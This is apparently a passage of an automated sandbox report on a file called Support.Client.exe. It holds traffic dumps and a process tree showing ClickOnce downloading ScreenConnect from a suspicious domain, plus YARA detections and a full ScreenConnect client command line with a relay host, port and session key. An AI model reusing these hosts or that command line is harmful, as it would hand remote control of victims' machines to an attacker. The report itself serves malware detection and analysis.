                                                                                                                                                                                                                                                Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 1d
                                                                                                                                                                                                                                                Data Ascii: 4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f 32
                                                                                                                                                                                                                                                Data Ascii: 9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__2
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70
                                                                                                                                                                                                                                                Data Ascii: aseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelp
                                                                                                                                                                                                                                                2024-12-22 11:47:32 UTC16384INData Raw: 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c
                                                                                                                                                                                                                                                Data Ascii: <9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.L
                                                                                                                                                                                                                                                2024-12-22 11:47:33 UTC16384INData Raw: 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00
                                                                                                                                                                                                                                                Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49763 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:36 UTC | 134 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:36 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 601376
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:35 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 104.168.134.232 | 443 | 7604 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-22 11:47:39 UTC | 125 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: crea.alarmasdelsureste.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-12-22 11:47:40 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548864
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
Date: Sun, 22 Dec 2024 11:47:39 GMT
Connection: close



                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:06:46:56
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Support.Client.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Support.Client.exe"
                                                                                                                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                                                                                                                File size:83'424 bytes
                                                                                                                                                                                                                                                MD5 hash:35981EB47CA481B1CC8F4495DA53685F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:06:46:56
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                Imagebase:0x2513e4e0000
                                                                                                                                                                                                                                                File size:24'856 bytes
                                                                                                                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                                                                                                                                                                                                                                                Imagebase:0x7d0000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                                                                                                                                                                                                                                                Imagebase:0x7d0000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                Imagebase:0x210000
                                                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                Imagebase:0x210000
                                                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:06:47:44
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User"
                                                                                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                                                  Total number of Nodes:1462
                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
5159->5161 5160->5161 5161->5091 5205 c0426e 5162->5205 5313 c06b14 5167->5313 5169 c03f35 5171 c03f3e IsProcessorFeaturePresent 5169->5171 5172 c03f5c 5169->5172 5174 c03f49 5171->5174 5175 c03793 _abort 23 API calls 5172->5175 5341 c04573 5174->5341 5177 c03f66 5175->5177 5182 c0576d 5178->5182 5183 c05771 _abort 5178->5183 5179 c05791 5181 c0579d GetProcAddress 5179->5181 5179->5183 5181->5183 5182->5179 5182->5183 5184 c057dd 5182->5184 5183->5147 5185 c057fe LoadLibraryExW 5184->5185 5189 c057f3 5184->5189 5186 c05833 5185->5186 5187 c0581b GetLastError 5185->5187 5186->5189 5190 c0584a FreeLibrary 5186->5190 5187->5186 5188 c05826 LoadLibraryExW 5187->5188 5188->5186 5189->5182 5190->5189 5194 c069d6 5191->5194 5193 c069a8 _ValidateLocalCookies 5193->5156 5195 c069e2 ___scrt_is_nonwritable_in_current_image 5194->5195 5200 c056e2 EnterCriticalSection 5195->5200 5197 c069ed 5201 c06a1f 5197->5201 5199 c06a14 _abort 5199->5193 5200->5197 5204 c0572a LeaveCriticalSection 5201->5204 5203 c06a26 5203->5199 5204->5203 5211 c041ae 5205->5211 5207 c04292 5208 c0421e 5207->5208 5222 c040b2 5208->5222 5210 c04242 5210->5099 5212 c041ba ___scrt_is_nonwritable_in_current_image 5211->5212 5217 c056e2 EnterCriticalSection 5212->5217 5214 c041c4 5218 c041ea 5214->5218 5216 c041e2 _abort 5216->5207 5217->5214 5221 c0572a LeaveCriticalSection 5218->5221 5220 c041f4 5220->5216 5221->5220 5223 c040be ___scrt_is_nonwritable_in_current_image 5222->5223 5230 c056e2 EnterCriticalSection 5223->5230 5225 c040c8 5231 c043d9 5225->5231 5227 c040e0 5235 c040f6 5227->5235 5229 c040ee _abort 5229->5210 5230->5225 5232 c0440f __fassign 5231->5232 5233 c043e8 __fassign 5231->5233 5232->5227 5233->5232 5238 c06507 5233->5238 5312 c0572a LeaveCriticalSection 5235->5312 5237 c04100 5237->5229 5239 c06587 5238->5239 5242 c0651d 5238->5242 5241 c04869 _free 15 API calls 5239->5241 5264 c065d5 5239->5264 5243 c065a9 5241->5243 5242->5239 5246 c06550 5242->5246 5249 c04869 _free 15 API calls 
5242->5249 5244 c04869 _free 15 API calls 5243->5244 5245 c065bc 5244->5245 5251 c04869 _free 15 API calls 5245->5251 5252 c04869 _free 15 API calls 5246->5252 5265 c06572 5246->5265 5247 c04869 _free 15 API calls 5253 c0657c 5247->5253 5248 c065e3 5254 c06643 5248->5254 5263 c04869 15 API calls _free 5248->5263 5250 c06545 5249->5250 5266 c06078 5250->5266 5256 c065ca 5251->5256 5257 c06567 5252->5257 5258 c04869 _free 15 API calls 5253->5258 5259 c04869 _free 15 API calls 5254->5259 5261 c04869 _free 15 API calls 5256->5261 5294 c06176 5257->5294 5258->5239 5260 c06649 5259->5260 5260->5232 5261->5264 5263->5248 5306 c0667a 5264->5306 5265->5247 5267 c06089 5266->5267 5293 c06172 5266->5293 5268 c04869 _free 15 API calls 5267->5268 5272 c0609a 5267->5272 5268->5272 5269 c04869 _free 15 API calls 5270 c060ac 5269->5270 5271 c060be 5270->5271 5273 c04869 _free 15 API calls 5270->5273 5274 c060d0 5271->5274 5275 c04869 _free 15 API calls 5271->5275 5272->5269 5272->5270 5273->5271 5276 c060e2 5274->5276 5277 c04869 _free 15 API calls 5274->5277 5275->5274 5278 c060f4 5276->5278 5279 c04869 _free 15 API calls 5276->5279 5277->5276 5280 c06106 5278->5280 5281 c04869 _free 15 API calls 5278->5281 5279->5278 5282 c06118 5280->5282 5283 c04869 _free 15 API calls 5280->5283 5281->5280 5284 c0612a 5282->5284 5285 c04869 _free 15 API calls 5282->5285 5283->5282 5286 c0613c 5284->5286 5287 c04869 _free 15 API calls 5284->5287 5285->5284 5288 c0614e 5286->5288 5289 c04869 _free 15 API calls 5286->5289 5287->5286 5290 c06160 5288->5290 5291 c04869 _free 15 API calls 5288->5291 5289->5288 5292 c04869 _free 15 API calls 5290->5292 5290->5293 5291->5290 5292->5293 5293->5246 5295 c06183 5294->5295 5305 c061db 5294->5305 5296 c06193 5295->5296 5297 c04869 _free 15 API calls 5295->5297 5298 c04869 _free 15 API calls 5296->5298 5302 c061a5 5296->5302 5297->5296 5298->5302 5299 c04869 _free 15 API calls 5300 c061b7 5299->5300 5301 c061c9 5300->5301 5303 c04869 _free 15 API calls 
5300->5303 5304 c04869 _free 15 API calls 5301->5304 5301->5305 5302->5299 5302->5300 5303->5301 5304->5305 5305->5265 5307 c06687 5306->5307 5311 c066a5 5306->5311 5308 c0621b __fassign 15 API calls 5307->5308 5307->5311 5309 c0669f 5308->5309 5310 c04869 _free 15 API calls 5309->5310 5310->5311 5311->5248 5312->5237 5345 c06a82 5313->5345 5316 c06b6f 5317 c06b7b _abort 5316->5317 5322 c06ba8 _abort 5317->5322 5323 c06ba2 _abort 5317->5323 5359 c044a8 GetLastError 5317->5359 5319 c06bf4 5320 c047f9 __dosmaperr 15 API calls 5319->5320 5321 c06bf9 5320->5321 5378 c0473d 5321->5378 5327 c06c20 5322->5327 5381 c056e2 EnterCriticalSection 5322->5381 5323->5319 5323->5322 5326 c06bd7 _abort 5323->5326 5326->5169 5328 c06c7f 5327->5328 5330 c06c77 5327->5330 5338 c06caa 5327->5338 5382 c0572a LeaveCriticalSection 5327->5382 5328->5338 5383 c06b66 5328->5383 5333 c03793 _abort 23 API calls 5330->5333 5333->5328 5335 c04424 _abort 33 API calls 5339 c06d0d 5335->5339 5337 c06b66 _abort 33 API calls 5337->5338 5386 c06d2f 5338->5386 5339->5326 5340 c04424 _abort 33 API calls 5339->5340 5340->5326 5342 c0458f _abort 5341->5342 5343 c045bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5342->5343 5344 c0468c _abort _ValidateLocalCookies 5343->5344 5344->5172 5348 c06a28 5345->5348 5347 c03f29 5347->5169 5347->5316 5349 c06a34 ___scrt_is_nonwritable_in_current_image 5348->5349 5354 c056e2 EnterCriticalSection 5349->5354 5351 c06a42 5355 c06a76 5351->5355 5353 c06a69 _abort 5353->5347 5354->5351 5358 c0572a LeaveCriticalSection 5355->5358 5357 c06a80 5357->5353 5358->5357 5360 c044c1 5359->5360 5361 c044c7 5359->5361 5363 c05904 _abort 6 API calls 5360->5363 5362 c0480c _abort 12 API calls 5361->5362 5365 c0451e SetLastError 5361->5365 5364 c044d9 5362->5364 5363->5361 5367 c0595a _abort 6 API calls 5364->5367 5371 c044e1 5364->5371 5366 c04527 5365->5366 5366->5323 5369 c044f6 5367->5369 5368 c04869 _free 12 API calls 5370 c044e7 5368->5370 5369->5371 
